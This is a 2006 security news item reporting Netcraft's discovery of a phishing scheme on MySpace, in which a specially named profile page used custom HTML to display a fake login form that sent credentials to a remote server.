A New Phishing Attack on MySpace

Network security provider, 'Netcraft' warns that MySpace has fallen victim of a phishing scam that did not exist earlier. Attackers use a technique of tricking users to reveal passwords through an authentic MySpace account.

Netcraft (netcraft.com), which specializes in analyzing websites, on Thursday October 26 2006, discovered that hackers took command of MySpace (myspace.com), a social networking site, by offering a hoax login form on the main site. The login form dupes the victim to submit his/ her username and password to a distant server in France.

Netcraft has subsequently alerted MySpace of the situation. The fraud login page appears real as it is hosted on MySpace's own servers and does not provide any clue of external content like 'cross-site scripting' or 'open redirects'. Consequently, the attack can trap even those users who maintain security updates.

The attack takes place from a profile page having the username as 'login_home_index_html', and applies 'custom-coded HTML' to conceal the actual MySpace content, displaying the modified login form in its place. When through the process the user account is compromised, it becomes simple to access personal information.

The attack is special because it does not use doubtful techniques such as 'cross-site scripting' to spoof the users. This implies MySpace's automated tools employed to search malicious content may not give the strategic clues.

MySpace profiles have no concern with credit card numbers and bank accounts, being social networking site; however, they can be means to spread malware or to cunningly design even more skilled phishing attacks in the future.
According to Netcraft analyst Rich Miller, on October 27 2006, 'Pacific' exploited the way MySpace arranges URLs to present the false login page an authenticable web address. This scheme could baffle even the more security savvy users.

The attack is new, which indicates another malicious way that phishers are using to fool people into divulging their account details. Sites like MySpace are characteristic of containing database of unlimited usernames. If a user is not sure whether he/ she is on the right login page, they should go to the main address, said a News Corp. spokesperson.

Related article: A New "Blackmailing" Variant Creeps Around…

» SPAMfighter News - 11/1/2006